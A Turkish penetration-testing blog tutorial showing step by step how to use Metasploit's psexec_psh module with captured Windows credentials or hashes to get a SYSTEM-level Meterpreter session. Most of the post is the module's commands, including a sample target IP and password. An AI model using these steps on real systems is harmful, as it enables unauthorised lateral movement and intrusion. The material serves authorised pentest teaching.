MSF psexec_psh İstismar Modülü ve Elde Edilen Kimlik Bilgileri ile Windows Bir Bilgisayarlara Meterpreter Bağlantısı Elde Edilmesi

0
182
views
Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola / parola özeti) kullanılarak Windows bilgisayarlara erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı, parolası veya parola özeti) elde edilmiş bir Windows bilgisayara MSF psexec_psh istismar modülü ile Meterpreter bağlantısı gerçekleştirilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

MSF psexec_psh istismar modülünün genel seçenekleri aşağıdaki gibi listelenebilir.

search psexec platform:windows
use exploit/windows/smb/psexec_psh
show options

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-psh-exploit-module-01

Yerel yönetici haklarına sahip Vedat hesabının parolasının açık hali (veya özeti) ile MSF psexec_psh modülü aşağıdaki gibi ayarlanabilir:

set RHOSTS 192.168.100.120
set SMBUSER Levent
set SMBPASS Ll123456
show options

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-psh-exploit-module-02

Modül başlatıldıktan sonra, SYSTEM yetkileri ile Meterpreter bağlantısı elde edilir.

run
getuid
getpid

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-psh-exploit-module-03

Meterpreter bağlantısının enjekte olduğu prosesin, yeni oluşturulan Powershell prosesi olduğu görülmektedir.

ps -s

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-psh-exploit-module-04

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.